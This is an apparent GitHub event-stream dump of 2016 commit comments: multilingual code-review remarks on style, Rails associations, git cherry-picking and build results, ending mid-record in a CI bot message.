{"id":"4588579506","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Arshev/rails"},"payload":{"comment":{"id":19093491,"position":3,"line":3,"path":"tutu/app/models/ticket.rb","commit_id":"caaeb45b37c4f1fcc7eceb841e78f8f52d4c11e8","created_at":"2016-09-20T09:46:46Z","updated_at":"2016-09-20T09:46:46Z","body":"Тут все верно,  а чтобы связать с начальной и конечной станцией, надо добавить еще 2 ассоциации (и соответственно 2 поля). в этих полях будут храниться объекты RailwayStation, но сами ассоциации и поля в таблице должны называться по-разному, например, departure_station и arrival_station.\r\nАналогично у нас сделана ассоциация current_station в Train."}},"created_at":"2016-09-20T09:46:46Z"}
{"id":"4588580080","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19093495,"position":null,"line":null,"path":null,"commit_id":"5da15b62c130b757e4ae6bdda5fd7fad5968b435","created_at":"2016-09-20T09:46:52Z","updated_at":"2016-09-20T09:46:52Z","body":"Initial commit."}},"created_at":"2016-09-20T09:46:52Z"}
{"id":"4588580261","type":"CommitCommentEvent","actor":{"login":"RubenKelevra"},"repo":{"name":"mysensors/MySensors"},"payload":{"comment":{"id":19093496,"position":363,"line":224,"path":"libraries/MySensors/core/MyGatewayTransportMQTTClient.cpp","commit_id":"77bb94c16f01fbd1884165d034b2eaffc0a12f8a","created_at":"2016-09-20T09:46:54Z","updated_at":"2016-09-20T09:46:54Z","body":"I thin this is missing a not"}},"created_at":"2016-09-20T09:46:54Z"}
{"id":"4588581447","type":"CommitCommentEvent","actor":{"login":"soumyanishan"},"repo":{"name":"bpramod/azure-linux-extensions"},"payload":{"comment":{"id":19093499,"position":9,"line":9,"path":"VMBackup/main/Utils/Status.py","commit_id":"e481a6f4244471f9bc779ae5d55aca801b817a80","created_at":"2016-09-20T09:47:09Z","updated_at":"2016-09-20T09:47:09Z","body":"rename to some valid function name - convertToDictionary"}},"created_at":"2016-09-20T09:47:09Z"}
{"id":"4588583244","type":"CommitCommentEvent","actor":{"login":"tmeissner"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19093504,"position":17,"line":17,"path":"data_structures/src/Dictionary.vhd","commit_id":"ddb0959bca5a340964df7455f8180757a1741601","created_at":"2016-09-20T09:47:31Z","updated_at":"2016-09-20T09:47:31Z","body":"I have removed the `Init` procedure in the latest commit 470271f2a77e92625142dc1cd99c01e16e08d19d. I have also added an assert to the `Get` procedure, same like it was already in the `Get` function."}},"created_at":"2016-09-20T09:47:31Z"}
{"id":"4588585968","type":"CommitCommentEvent","actor":{"login":"bwboy"},"repo":{"name":"openstack/kolla"},"payload":{"comment":{"id":19093507,"position":null,"line":null,"path":null,"commit_id":"3b1b6abf5b0133ed79581d2970c8a9abaacd0a37","created_at":"2016-09-20T09:48:06Z","updated_at":"2016-09-20T09:48:06Z","body":"I run the check on ubuntu 16.04 and ansible 2.0.0.2 with Error：\r\n\r\nfatal: [localhost -> localhost]: FAILED! => {\"changed\": false, \"cmd\": [\"ansible\", \"--version\"], \"delta\": \"0:00:00.275598\", \"end\": \"2016-09-20 17:34:52.778632\", \"failed\": true, \"failed_when_result\": true, \"rc\": 0, \"start\": \"2016-09-20 17:34:52.503034\", \"stderr\": \"\", \"stdout\": \"ansible 2.0.0.2\\n  config file = /etc/ansible/ansible.cfg\\n  configured module search path = Default w/o overrides\", \"stdout_lines\": [\"ansible 2.0.0.2\", \"  config file = /etc/ansible/ansible.cfg\", \"  configured module search path = Default w/o overrides\"], \"warnings\": []}"}},"created_at":"2016-09-20T09:48:06Z"}
{"id":"4588586376","type":"CommitCommentEvent","actor":{"login":"alexmorleyfinch"},"repo":{"name":"insites/cookieconsent"},"payload":{"comment":{"id":19093508,"position":null,"line":null,"path":null,"commit_id":"4122e214593b86e9b989d58788b6b2a06f8e06ce","created_at":"2016-09-20T09:48:09Z","updated_at":"2016-09-20T09:48:09Z","body":"In my defence, one of those wasn't mine :)"}},"created_at":"2016-09-20T09:48:09Z"}
{"id":"4588588848","type":"CommitCommentEvent","actor":{"login":"frederic-mahe"},"repo":{"name":"torognes/vsearch"},"payload":{"comment":{"id":19093512,"position":null,"line":null,"path":null,"commit_id":"b756250a1cb6ad2a7681dd4eadad8bb0910360de","created_at":"2016-09-20T09:48:40Z","updated_at":"2016-09-20T09:48:40Z","body":"OK, I will put it back."}},"created_at":"2016-09-20T09:48:40Z"}
{"id":"4588596084","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way_rails_part1"},"payload":{"comment":{"id":19093531,"position":4,"line":4,"path":"10_rails_proj/exp_prog1/app/controllers/routes_controller.rb","commit_id":"ab5bcf996e102f17a2e1b6810c01621f359a1ec9","created_at":"2016-09-20T09:50:09Z","updated_at":"2016-09-20T09:50:09Z","body":"Настрой редактор на отступ ровно в 2 пробела, и именно пробела, а не таба. Форматирование кода важно."}},"created_at":"2016-09-20T09:50:09Z"}
{"id":"4588598087","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19093534,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T09:50:33Z","updated_at":"2016-09-20T09:50:33Z","body":"The point of the crash is to expose the bug. Putting a try/except just hides it. The only time you need a check/fix is when you are working on unsanitized data. In this case the data is from a known source and should be clean. If it isn't the source should be repaired. Having check/fixes everywhere makes the code bulky, slower, and harder to read, and makes it harder to find the cause of a bug when one occurs because the BSoD never happens."}},"created_at":"2016-09-20T09:50:33Z"}
{"id":"4588598326","type":"CommitCommentEvent","actor":{"login":"misakuo"},"repo":{"name":"misakuo/weex"},"payload":{"comment":{"id":19093535,"position":null,"line":null,"path":null,"commit_id":"258f3230588120b4efa6e70cf27c1ed140ef85b4","created_at":"2016-09-20T09:50:36Z","updated_at":"2016-09-20T09:50:36Z","body":"Android implement #1067"}},"created_at":"2016-09-20T09:50:36Z"}
{"id":"4588599897","type":"CommitCommentEvent","actor":{"login":"jelhan"},"repo":{"name":"jelhan/croodle"},"payload":{"comment":{"id":19093541,"position":5,"line":8,"path":"app/locales/es/translations.js","commit_id":"ed87a86c2c966e7a5505c117ad8c1b8149aed0b3","created_at":"2016-09-20T09:50:55Z","updated_at":"2016-09-20T09:50:55Z","body":"Just thought cause of credits. :-)\r\nhttps://github.com/jelhan/croodle/commit/fa0ac48500cac0a28bac71b5b49ac7d76008571a"}},"created_at":"2016-09-20T09:50:55Z"}
{"id":"4588601442","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way_rails_part1"},"payload":{"comment":{"id":19093546,"position":19,"line":19,"path":"10_rails_proj/exp_prog1/app/controllers/routes_controller.rb","commit_id":"ab5bcf996e102f17a2e1b6810c01621f359a1ec9","created_at":"2016-09-20T09:51:12Z","updated_at":"2016-09-20T09:51:12Z","body":"А если у нас валидация не пройдет? В этом случае надо показать ошибки, но если у тебя будет просто редирект, то информация об ошибках исчезнет, как и все введенные пользователем данные. Поэтому в случае ошибки нужен render"}},"created_at":"2016-09-20T09:51:12Z"}
{"id":"4588603036","type":"CommitCommentEvent","actor":{"login":"atd"},"repo":{"name":"P2Pvalue/teem"},"payload":{"comment":{"id":19093552,"position":36,"line":113,"path":"src/sass/utils.scss","commit_id":"de3cc6311f0a8d76369b1b3cff157f3b47a0f103","created_at":"2016-09-20T09:51:30Z","updated_at":"2016-09-20T09:51:30Z","body":"With transitions!! :heart_eyes: "}},"created_at":"2016-09-20T09:51:30Z"}
{"id":"4588606319","type":"CommitCommentEvent","actor":{"login":"OsipovDenis"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19093563,"position":29,"line":28,"path":"client/editItem/views/editItem.tpl.html","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T09:52:10Z","updated_at":"2016-09-20T09:52:10Z","body":"Вообще глаз режет мешанина в коде, стараюсь по максимуму разлеплять где это возможно.  Не правильно?("}},"created_at":"2016-09-20T09:52:10Z"}
{"id":"4588608159","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way_rails_part1"},"payload":{"comment":{"id":19093565,"position":8,"line":8,"path":"10_rails_proj/exp_prog1/config/routes.rb","commit_id":"ab5bcf996e102f17a2e1b6810c01621f359a1ec9","created_at":"2016-09-20T09:52:33Z","updated_at":"2016-09-20T09:52:33Z","body":"Зачем это роут, если у тебя уже есть `resources :routes`?"}},"created_at":"2016-09-20T09:52:33Z"}
{"id":"4588609690","type":"CommitCommentEvent","actor":{"login":"kpettinga"},"repo":{"name":"ObjectiveSubject/cgu"},"payload":{"comment":{"id":19093568,"position":null,"line":null,"path":null,"commit_id":"b611a6935bde4798d2ae375ad230a542eb3519c4","created_at":"2016-09-20T09:52:51Z","updated_at":"2016-09-20T09:52:51Z","body":"#62 "}},"created_at":"2016-09-20T09:52:51Z"}
{"id":"4588612396","type":"CommitCommentEvent","actor":{"login":"DanToml"},"repo":{"name":"DanToml/whereis"},"payload":{"comment":{"id":19093572,"position":1,"line":1,"path":"app/person.rb","commit_id":"4b4582d1012e9e54a3926354ffae759d1602ff5e","created_at":"2016-09-20T09:53:23Z","updated_at":"2016-09-20T09:53:23Z","body":"I have no class 😂 (also yes.)"}},"created_at":"2016-09-20T09:53:23Z"}
{"id":"4588617307","type":"CommitCommentEvent","actor":{"login":"zwliew"},"repo":{"name":"CyanogenMod/android_device_samsung_jf-common"},"payload":{"comment":{"id":19093583,"position":null,"line":null,"path":null,"commit_id":"6db2dd5b6e99e1996d38315716c032dc652ddc8a","created_at":"2016-09-20T09:54:20Z","updated_at":"2016-09-20T09:54:20Z","body":"I wonder whether stock experiences the same logcat spam as well. If not, I wonder why."}},"created_at":"2016-09-20T09:54:20Z"}
{"id":"4588618675","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19093586,"position":null,"line":null,"path":null,"commit_id":"3b70074de00491478ca32a2c24f4591e4409aea0","created_at":"2016-09-20T09:54:35Z","updated_at":"2016-09-20T09:54:35Z","body":"Because in ca 35% of cases there are no stmAttackers, so this saves us from verifying dc-candidates and pins in vane. (To be honest I thought the percentage is even higher).\r\nDon't know if this brings a speed up, maybe it's useless..."}},"created_at":"2016-09-20T09:54:35Z"}
{"id":"4588618899","type":"CommitCommentEvent","actor":{"login":"eaenet"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19093588,"position":5,"line":604,"path":"css-fonts/Fonts.src.html","commit_id":"19da62ca0e80e24cdbbced4f27e261fe9c03fa60","created_at":"2016-09-20T09:54:37Z","updated_at":"2016-09-20T09:54:37Z","body":"Shouldn't this be 1-1000?"}},"created_at":"2016-09-20T09:54:37Z"}
{"id":"4588624303","type":"CommitCommentEvent","actor":{"login":"jonathan-fielding"},"repo":{"name":"SimpleStateManager/SimpleStateManager"},"payload":{"comment":{"id":19093598,"position":null,"line":null,"path":null,"commit_id":"7c4777a6efbcdcb4c611f7cbe93fbb1109f79325","created_at":"2016-09-20T09:55:43Z","updated_at":"2016-09-20T09:55:43Z","body":"The only docs is a quick note at the end of this issue, the issue is open so I can document it when I have a chance\r\n\r\nhttps://github.com/SimpleStateManager/SimpleStateManager/issues/16\r\n\r\nThanks\r\n\r\nJonathan"}},"created_at":"2016-09-20T09:55:43Z"}
{"id":"4588625249","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"CyanogenMod/android_device_samsung_jf-common"},"payload":{"comment":{"id":19093601,"position":null,"line":null,"path":null,"commit_id":"6db2dd5b6e99e1996d38315716c032dc652ddc8a","created_at":"2016-09-20T09:55:54Z","updated_at":"2016-09-20T09:55:54Z","body":"i merged the commit that @sombree posted and i am now building.i will report back"}},"created_at":"2016-09-20T09:55:54Z"}
{"id":"4588629320","type":"CommitCommentEvent","actor":{"login":"Yajo"},"repo":{"name":"OCA/web"},"payload":{"comment":{"id":19093611,"position":16,"line":38,"path":"web_widget_image_webcam/static/src/js/webcam_widget.js","commit_id":"90510a0a163389b2b24e209adc807e82ba1af479","created_at":"2016-09-20T09:56:41Z","updated_at":"2016-09-20T09:56:41Z","body":"This is a bit misleading, because you will get `true` or `\"true\"` probably. Although it might work, it gets easier to understand if you just put `if (default_flash_fallback_mode)`."}},"created_at":"2016-09-20T09:56:41Z"}
{"id":"4588631200","type":"CommitCommentEvent","actor":{"login":"piiupilt"},"repo":{"name":"insites/cookieconsent"},"payload":{"comment":{"id":19093613,"position":null,"line":null,"path":null,"commit_id":"4122e214593b86e9b989d58788b6b2a06f8e06ce","created_at":"2016-09-20T09:57:02Z","updated_at":"2016-09-20T09:57:02Z","body":"Obviously you've a bad influence on me."}},"created_at":"2016-09-20T09:57:02Z"}
{"id":"4588631822","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19093616,"position":29,"line":28,"path":"client/editItem/views/editItem.tpl.html","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T09:57:10Z","updated_at":"2016-09-20T09:57:10Z","body":"Как-то не очень выглядит нмв"}},"created_at":"2016-09-20T09:57:10Z"}
{"id":"4588639070","type":"CommitCommentEvent","actor":{"login":"sombree"},"repo":{"name":"robcore/machinex"},"payload":{"comment":{"id":19093633,"position":null,"line":null,"path":null,"commit_id":"a704f73ecde50566ae6c8bcd54242de3905ef906","created_at":"2016-09-20T09:58:35Z","updated_at":"2016-09-20T09:58:35Z","body":"Cherry-picking is quite simple - https://ariejan.net/2010/06/10/cherry-picking-specific-commits-from-another-branch/\r\nIf you want to cherry-pick from another repo - just execute \"git fetch url-to-repo\" in your local git repository before picking - at least thats how I'm doing this :)\r\nBtw. sometimes there might be a conflict - then use \"git status\" to see which files are affected so you can manually merge code. Then just add this file (files) and execute \"git cherry-pick --continue\"."}},"created_at":"2016-09-20T09:58:35Z"}
{"id":"4588641307","type":"CommitCommentEvent","actor":{"login":"balamyt92"},"repo":{"name":"lulekDayn/helloworld"},"payload":{"comment":{"id":19093636,"position":null,"line":null,"path":null,"commit_id":"6d8607e5aa7202cc3db6325f6c90c5486e41bcdc","created_at":"2016-09-20T09:59:00Z","updated_at":"2016-09-20T09:59:00Z","body":"Прогресс :)"}},"created_at":"2016-09-20T09:59:00Z"}
{"id":"4593246458","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106203,"position":13,"line":13,"path":"Assignment_2_Vacuum_Cleaner/world/Test.java","commit_id":"3e6c5b14f1fa6e2e8de23687a9f530cd7e54cf59","created_at":"2016-09-21T00:00:12Z","updated_at":"2016-09-21T00:00:12Z","body":"Too much whitespace."}},"created_at":"2016-09-21T00:00:12Z"}
{"id":"4593248100","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106213,"position":6,"line":6,"path":"Assignment_2_Vacuum_Cleaner/world/Test.java","commit_id":"3e6c5b14f1fa6e2e8de23687a9f530cd7e54cf59","created_at":"2016-09-21T00:00:35Z","updated_at":"2016-09-21T00:00:35Z","body":"Spaces go between arguments."}},"created_at":"2016-09-21T00:00:35Z"}
{"id":"4593253475","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106220,"position":null,"line":null,"path":null,"commit_id":"61744f7b6ad2af0df9dce0886a941bafd4155f97","created_at":"2016-09-21T00:02:09Z","updated_at":"2016-09-21T00:02:09Z","body":"Don't commit class files.\r\n\r\nAdd the following to your `.gitignore` file: \r\n```\r\n*.class\r\n```"}},"created_at":"2016-09-21T00:02:09Z"}
{"id":"4593254816","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106221,"position":8,"line":6,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"61744f7b6ad2af0df9dce0886a941bafd4155f97","created_at":"2016-09-21T00:02:31Z","updated_at":"2016-09-21T00:02:31Z","body":"Agent is what?"}},"created_at":"2016-09-21T00:02:31Z"}
{"id":"4593256007","type":"CommitCommentEvent","actor":{"login":"kmonson"},"repo":{"name":"kmonson/volttron"},"payload":{"comment":{"id":19106224,"position":6,"line":7,"path":"examples/configurations/drivers/modbus1.config","commit_id":"cf0a5007f8758c0a0ff1a30e6bfbc620aa3e9b96","created_at":"2016-09-21T00:02:53Z","updated_at":"2016-09-21T00:02:53Z","body":"Bleh, that was a mistake. Remind me to fix it before I do the pull request."}},"created_at":"2016-09-21T00:02:53Z"}
{"id":"4593258045","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106228,"position":68,"line":66,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"61744f7b6ad2af0df9dce0886a941bafd4155f97","created_at":"2016-09-21T00:03:31Z","updated_at":"2016-09-21T00:03:31Z","body":"Whitespace!"}},"created_at":"2016-09-21T00:03:31Z"}
{"id":"4593259526","type":"CommitCommentEvent","actor":{"login":"ygorlazaro"},"repo":{"name":"qmpedro/MeuTioOperouREST"},"payload":{"comment":{"id":19106232,"position":null,"line":null,"path":null,"commit_id":"68cb48ea627c7b493b9004f27e572df2e9ca9653","created_at":"2016-09-21T00:03:53Z","updated_at":"2016-09-21T00:03:53Z","body":"Nice!"}},"created_at":"2016-09-21T00:03:53Z"}
{"id":"4593260076","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106234,"position":85,"line":83,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"61744f7b6ad2af0df9dce0886a941bafd4155f97","created_at":"2016-09-21T00:04:01Z","updated_at":"2016-09-21T00:04:01Z","body":"Add whitespace after this line."}},"created_at":"2016-09-21T00:04:01Z"}
{"id":"4593263035","type":"CommitCommentEvent","actor":{"login":"edace91"},"repo":{"name":"edace91/Petripper"},"payload":{"comment":{"id":19106241,"position":null,"line":null,"path":null,"commit_id":"c055aabcaa9b0ca2887ad701e3cbd9cff40bfe3b","created_at":"2016-09-21T00:04:48Z","updated_at":"2016-09-21T00:04:48Z","body":"good job!"}},"created_at":"2016-09-21T00:04:48Z"}
{"id":"4593265562","type":"CommitCommentEvent","actor":{"login":"mscdex"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19106244,"position":null,"line":null,"path":null,"commit_id":"60ba1a2a2324c598c9f9b8a739f5c4e3cde8e2e4","created_at":"2016-09-21T00:05:11Z","updated_at":"2016-09-21T00:05:11Z","body":"This is missing commit metadata."}},"created_at":"2016-09-21T00:05:11Z"}
{"id":"4593266528","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106249,"position":23,"line":21,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"61744f7b6ad2af0df9dce0886a941bafd4155f97","created_at":"2016-09-21T00:05:29Z","updated_at":"2016-09-21T00:05:29Z","body":"Method names begin w/ lowercase letters."}},"created_at":"2016-09-21T00:05:29Z"}
{"id":"4593267203","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106251,"position":28,"line":26,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"61744f7b6ad2af0df9dce0886a941bafd4155f97","created_at":"2016-09-21T00:05:40Z","updated_at":"2016-09-21T00:05:40Z","body":"Method names begin w/ lowercase letters.\r\n"}},"created_at":"2016-09-21T00:05:40Z"}
{"id":"4593267585","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106254,"position":33,"line":31,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"61744f7b6ad2af0df9dce0886a941bafd4155f97","created_at":"2016-09-21T00:05:48Z","updated_at":"2016-09-21T00:05:48Z","body":"Method names begin w/ lowercase letters.\r\n\r\n"}},"created_at":"2016-09-21T00:05:48Z"}
{"id":"4593268781","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106260,"position":74,"line":72,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"61744f7b6ad2af0df9dce0886a941bafd4155f97","created_at":"2016-09-21T00:06:10Z","updated_at":"2016-09-21T00:06:10Z","body":"Name this a little better."}},"created_at":"2016-09-21T00:06:10Z"}
{"id":"4593282007","type":"CommitCommentEvent","actor":{"login":"Zangetsu38"},"repo":{"name":"Zangetsu38/rpcs3"},"payload":{"comment":{"id":19106281,"position":null,"line":null,"path":null,"commit_id":"80533e89baf19a7ae825374ae688b733e849b680","created_at":"2016-09-21T00:10:17Z","updated_at":"2016-09-21T00:10:17Z","body":"@danilaml LLVM 3.9 is released in the official version of the lib are available for travis and appveyor.\r\nIt works without problem, I would be sent thee you can make a Pull Request on the master.\r\nThere's just to make the change to travis and appveyor, but that you're the expert, and I have no access to the drive folder to the lib.\r\nIf you want to make a cherry pick to commit or I'm sending in PR on a branch of your choice told me."}},"created_at":"2016-09-21T00:10:17Z"}
{"id":"4593285679","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106291,"position":33,"line":69,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"14e3e8cb62cc129991c2e633e9bf565492d1203e","created_at":"2016-09-21T00:11:29Z","updated_at":"2016-09-21T00:11:29Z","body":"This if statement seems incomplete."}},"created_at":"2016-09-21T00:11:29Z"}
{"id":"4593286706","type":"CommitCommentEvent","actor":{"login":"ericsink"},"repo":{"name":"akavache/Akavache"},"payload":{"comment":{"id":19106293,"position":null,"line":null,"path":null,"commit_id":"b628ca21ca425345987c0202a0bfa658e6c17154","created_at":"2016-09-21T00:11:47Z","updated_at":"2016-09-21T00:11:47Z","body":"FYI this PR was a bit old and is no longer the way to go. \n\nPackage id SQLitePCL.raw is now also deprecated. When 1.0 shipped, the id changed to SQLitePCLRaw.core. It should not change again. :-)\n\nA one line Init call from platform specific code is also needed now. Does Akavache have any kind of initialization call which is called by the app code?"}},"created_at":"2016-09-21T00:11:47Z"}
{"id":"4593287855","type":"CommitCommentEvent","actor":{"login":"SINGHRISHIKESH"},"repo":{"name":"SINGHRISHIKESH/rishikesh"},"payload":{"comment":{"id":19106295,"position":null,"line":null,"path":null,"commit_id":"c58a969741e9639d481d26d3a3b86ed26123ece2","created_at":"2016-09-21T00:12:10Z","updated_at":"2016-09-21T00:12:10Z","body":"wow\r\n"}},"created_at":"2016-09-21T00:12:10Z"}
{"id":"4593290146","type":"CommitCommentEvent","actor":{"login":"donalgrant"},"repo":{"name":"TMT-STIL-DEF/tmt-stil-demo-temp"},"payload":{"comment":{"id":19106300,"position":null,"line":null,"path":null,"commit_id":"165de18d34065985e6dd210cb2409606b57f6139","created_at":"2016-09-21T00:12:53Z","updated_at":"2016-09-21T00:12:53Z","body":"comment on a commit"}},"created_at":"2016-09-21T00:12:53Z"}
{"id":"4593290892","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106301,"position":10,"line":72,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"387b95cae076ad305d81c7f3387a022ab7c26ba8","created_at":"2016-09-21T00:13:07Z","updated_at":"2016-09-21T00:13:07Z","body":"The indentation on this is really odd."}},"created_at":"2016-09-21T00:13:07Z"}
{"id":"4593291911","type":"CommitCommentEvent","actor":{"login":"jkoppel"},"repo":{"name":"jkoppel/project-ironfist"},"payload":{"comment":{"id":19106305,"position":35,"line":365,"path":"ironfist/src/cpp/combat/combat.cpp","commit_id":"9da337881b4a3756addec4331957df78e1450168","created_at":"2016-09-21T00:13:27Z","updated_at":"2016-09-21T00:13:27Z","body":"Yep. This is how you handle this pattern."}},"created_at":"2016-09-21T00:13:27Z"}
{"id":"4593292425","type":"CommitCommentEvent","actor":{"login":"kazuki43zoo"},"repo":{"name":"tokuhirom/java-handbook"},"payload":{"comment":{"id":19106306,"position":20,"line":20,"path":"spring/mybatis.md","commit_id":"b7ee0d4aa9ca06ec23a40ddc3116c7baec70cbd3","created_at":"2016-09-21T00:13:39Z","updated_at":"2016-09-21T00:13:39Z","body":"`true` -> `30` っすねw（なにげに犯人は自分説）"}},"created_at":"2016-09-21T00:13:39Z"}
{"id":"4593292432","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106307,"position":6,"line":68,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"387b95cae076ad305d81c7f3387a022ab7c26ba8","created_at":"2016-09-21T00:13:39Z","updated_at":"2016-09-21T00:13:39Z","body":"Why not start from the 0th index?"}},"created_at":"2016-09-21T00:13:39Z"}
{"id":"4593295622","type":"CommitCommentEvent","actor":{"login":"bengolder"},"repo":{"name":"codeforamerica/intake"},"payload":{"comment":{"id":19106315,"position":6,"line":18,"path":"templates/rap_sheet_instructions.jinja","commit_id":"64fc65da02544481a89fc3f04c50e3a962a08994","created_at":"2016-09-21T00:14:44Z","updated_at":"2016-09-21T00:14:44Z","body":"the closing tag is incorrect here @jazmynlatimer "}},"created_at":"2016-09-21T00:14:44Z"}
{"id":"4593295969","type":"CommitCommentEvent","actor":{"login":"jkoppel"},"repo":{"name":"jkoppel/project-ironfist"},"payload":{"comment":{"id":19106317,"position":null,"line":null,"path":null,"commit_id":"9da337881b4a3756addec4331957df78e1450168","created_at":"2016-09-21T00:14:51Z","updated_at":"2016-09-21T00:14:51Z","body":"I approve all these changes."}},"created_at":"2016-09-21T00:14:51Z"}
{"id":"4593297926","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106323,"position":34,"line":104,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"387b95cae076ad305d81c7f3387a022ab7c26ba8","created_at":"2016-09-21T00:15:28Z","updated_at":"2016-09-21T00:15:28Z","body":"What is performance doing?"}},"created_at":"2016-09-21T00:15:28Z"}
{"id":"4593300061","type":"CommitCommentEvent","actor":{"login":"hlokavarapu"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19106328,"position":null,"line":null,"path":null,"commit_id":"417bea8a6d1682057b2c94b18b1cb05533eceb33","created_at":"2016-09-21T00:16:10Z","updated_at":"2016-09-21T00:16:10Z","body":"Sure thing. "}},"created_at":"2016-09-21T00:16:10Z"}
{"id":"4593301577","type":"CommitCommentEvent","actor":{"login":"Trott"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19106332,"position":null,"line":null,"path":null,"commit_id":"60ba1a2a2324c598c9f9b8a739f5c4e3cde8e2e4","created_at":"2016-09-21T00:16:39Z","updated_at":"2016-09-21T00:16:39Z","body":"(Fixed with a force push. I apologize for the inconvenience.)"}},"created_at":"2016-09-21T00:16:39Z"}
{"id":"4593304996","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106337,"position":null,"line":null,"path":null,"commit_id":"0398a11cbb8e745220ac5deb20efb97245b42061","created_at":"2016-09-21T00:17:49Z","updated_at":"2016-09-21T00:17:49Z","body":"So far your git commit messages are pretty good. This one's a little iffy. `Protect against IndexOutOfBounds` would suffice. Here's a good guide on git commit messages: https://robots.thoughtbot.com/5-useful-tips-for-a-better-commit-message"}},"created_at":"2016-09-21T00:17:49Z"}
{"id":"4593306793","type":"CommitCommentEvent","actor":{"login":"QingpingMeng"},"repo":{"name":"QingpingMeng/eventspool"},"payload":{"comment":{"id":19106341,"position":null,"line":null,"path":null,"commit_id":"06e9a4dffc84d133b7e80f04456b8b83d713e930","created_at":"2016-09-21T00:18:26Z","updated_at":"2016-09-21T00:18:26Z","body":"Nice!"}},"created_at":"2016-09-21T00:18:26Z"}
{"id":"4593311549","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106348,"position":null,"line":null,"path":null,"commit_id":"f0ad4d118f63f5334be54fab1f77be147491ee5e","created_at":"2016-09-21T00:19:54Z","updated_at":"2016-09-21T00:19:54Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1766 of 1766 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a 